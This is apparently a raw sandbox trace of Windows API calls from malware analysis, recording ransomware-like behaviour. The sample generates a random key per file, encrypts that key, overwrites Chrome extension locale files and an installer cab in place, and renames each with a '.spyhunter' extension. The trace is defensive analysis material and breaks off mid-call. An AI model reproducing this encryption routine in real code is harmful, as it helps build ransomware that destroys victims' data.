GetProcessHeap () returned 0x2c0000 [0136.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.875] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf23c*=0xd4, lpOverlapped=0x0) returned 1 [0136.885] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.885] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xd4, lpNumberOfBytesWritten=0x25cf23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf23c*=0xd4, lpOverlapped=0x0) returned 1 [0136.885] GetProcessHeap () returned 0x2c0000 [0136.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.885] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.885] WriteFile (in: hFile=0x178, lpBuffer=0x25cf27c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf23c, lpOverlapped=0x0 | out: lpBuffer=0x25cf27c*, lpNumberOfBytesWritten=0x25cf23c*=0x4, lpOverlapped=0x0) returned 1 [0136.886] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf23c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf23c*=0x30, lpOverlapped=0x0) returned 1 [0136.886] CloseHandle (hObject=0x178) returned 1 [0136.886] GetProcessHeap () returned 0x2c0000 [0136.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0136.886] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json.spyhunter") returned 168 [0136.886] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json.spyhunter")) returned 1 [0136.887] GetProcessHeap () returned 0x2c0000 [0136.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0136.887] GetProcessHeap () returned 0x2c0000 [0136.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0136.887] GetProcessHeap () returned 0x2c0000 [0136.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d3d8 | out: hHeap=0x2c0000) returned 1 [0136.888] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf278 | out: pbBuffer=0x25cf278) returned 1 [0136.888] GetProcessHeap () returned 0x2c0000 [0136.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.888] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf270*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf270*=0x30) returned 1 [0136.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0136.889] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json") returned 155 [0136.889] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.889] GetProcessHeap () returned 0x2c0000 [0136.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.889] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf234, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf234*=0xe3, lpOverlapped=0x0) returned 1 [0136.889] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff1d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.890] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x25cf234, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf234*=0xe3, lpOverlapped=0x0) returned 1 [0136.890] GetProcessHeap () returned 0x2c0000 [0136.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.890] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.890] WriteFile (in: hFile=0x178, lpBuffer=0x25cf274*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf234, lpOverlapped=0x0 | out: lpBuffer=0x25cf274*, lpNumberOfBytesWritten=0x25cf234*=0x4, lpOverlapped=0x0) returned 1 [0136.890] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf234, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf234*=0x30, lpOverlapped=0x0) returned 1 [0136.890] CloseHandle (hObject=0x178) returned 1 [0136.890] GetProcessHeap () returned 0x2c0000 [0136.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0136.890] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.spyhunter") returned 165 [0136.890] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.spyhunter")) returned 1 [0136.891] GetProcessHeap () returned 0x2c0000 [0136.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0136.891] GetProcessHeap () returned 0x2c0000 [0136.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0136.891] GetProcessHeap () returned 0x2c0000 [0136.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d9f8 | out: hHeap=0x2c0000) returned 1 [0136.892] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf270 | out: pbBuffer=0x25cf270) returned 1 [0136.892] GetProcessHeap () returned 0x2c0000 [0136.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.892] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf268*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf268*=0x30) returned 1 [0136.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0136.893] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json") returned 155 [0136.893] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.893] GetProcessHeap () returned 0x2c0000 [0136.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.893] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf22c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf22c*=0xe1, lpOverlapped=0x0) returned 1 [0136.894] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff1f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.894] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xe1, lpNumberOfBytesWritten=0x25cf22c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf22c*=0xe1, lpOverlapped=0x0) returned 1 [0136.894] GetProcessHeap () returned 0x2c0000 [0136.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.894] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.894] WriteFile (in: hFile=0x178, lpBuffer=0x25cf26c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf22c, lpOverlapped=0x0 | out: lpBuffer=0x25cf26c*, lpNumberOfBytesWritten=0x25cf22c*=0x4, lpOverlapped=0x0) returned 1 [0136.894] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf22c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf22c*=0x30, lpOverlapped=0x0) returned 1 [0136.894] CloseHandle (hObject=0x178) returned 1 [0136.894] GetProcessHeap () returned 0x2c0000 [0136.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0136.894] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.spyhunter") returned 165 [0136.894] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.spyhunter")) returned 1 [0136.895] GetProcessHeap () returned 0x2c0000 [0136.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0136.895] GetProcessHeap () returned 0x2c0000 [0136.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0136.895] GetProcessHeap () returned 0x2c0000 [0136.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d0c8 | out: hHeap=0x2c0000) returned 1 [0136.896] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf268 | out: pbBuffer=0x25cf268) returned 1 [0136.896] GetProcessHeap () returned 0x2c0000 [0136.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.896] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf260*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf260*=0x30) returned 1 [0136.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0136.897] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json") returned 155 [0136.897] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.897] GetProcessHeap () returned 0x2c0000 [0136.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.897] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf224, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf224*=0xd8, lpOverlapped=0x0) returned 1 [0136.898] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.898] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xd8, lpNumberOfBytesWritten=0x25cf224, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf224*=0xd8, lpOverlapped=0x0) returned 1 [0136.898] GetProcessHeap () returned 0x2c0000 [0136.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.898] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.898] WriteFile (in: hFile=0x178, lpBuffer=0x25cf264*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf224, lpOverlapped=0x0 | out: lpBuffer=0x25cf264*, lpNumberOfBytesWritten=0x25cf224*=0x4, lpOverlapped=0x0) returned 1 [0136.899] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf224, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf224*=0x30, lpOverlapped=0x0) returned 1 [0136.899] CloseHandle (hObject=0x178) returned 1 [0136.899] GetProcessHeap () returned 0x2c0000 [0136.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0136.899] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.spyhunter") returned 165 [0136.899] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.spyhunter")) returned 1 [0136.900] GetProcessHeap () returned 0x2c0000 [0136.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0136.900] GetProcessHeap () returned 0x2c0000 [0136.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0136.900] GetProcessHeap () returned 0x2c0000 [0136.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e4b0 | out: hHeap=0x2c0000) returned 1 [0136.901] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf260 | out: pbBuffer=0x25cf260) returned 1 [0136.901] GetProcessHeap () returned 0x2c0000 [0136.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.901] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf258*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf258*=0x30) returned 1 [0136.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0136.902] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json") returned 155 [0136.902] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.902] GetProcessHeap () returned 0x2c0000 [0136.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.902] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf21c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf21c*=0xde, lpOverlapped=0x0) returned 1 [0136.917] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.917] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x25cf21c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf21c*=0xde, lpOverlapped=0x0) returned 1 [0136.917] GetProcessHeap () returned 0x2c0000 [0136.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.917] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.918] WriteFile (in: hFile=0x178, lpBuffer=0x25cf25c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf21c, lpOverlapped=0x0 | out: lpBuffer=0x25cf25c*, lpNumberOfBytesWritten=0x25cf21c*=0x4, lpOverlapped=0x0) returned 1 [0136.918] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf21c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf21c*=0x30, lpOverlapped=0x0) returned 1 [0136.918] CloseHandle (hObject=0x178) returned 1 [0136.918] GetProcessHeap () returned 0x2c0000 [0136.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.918] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.spyhunter") returned 165 [0136.918] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.spyhunter")) returned 1 [0136.919] GetProcessHeap () returned 0x2c0000 [0136.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.919] GetProcessHeap () returned 0x2c0000 [0136.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0136.919] GetProcessHeap () returned 0x2c0000 [0136.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6db80 | out: hHeap=0x2c0000) returned 1 [0136.919] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf260 | out: pbBuffer=0x25cf260) returned 1 [0136.919] GetProcessHeap () returned 0x2c0000 [0136.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.919] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf258*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf258*=0x30) returned 1 [0136.919] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0136.920] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 123 [0136.920] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0136.920] GetProcessHeap () returned 0x2c0000 [0136.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.920] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf21c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf21c*=0x2800, lpOverlapped=0x0) returned 1 [0136.931] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.931] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf21c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf21c*=0x2800, lpOverlapped=0x0) returned 1 [0136.931] GetProcessHeap () returned 0x2c0000 [0136.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.931] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.931] WriteFile (in: hFile=0x178, lpBuffer=0x25cf25c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf21c, lpOverlapped=0x0 | out: lpBuffer=0x25cf25c*, lpNumberOfBytesWritten=0x25cf21c*=0x4, lpOverlapped=0x0) returned 1 [0137.441] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf21c, lpOverlapped=0x0 | out: 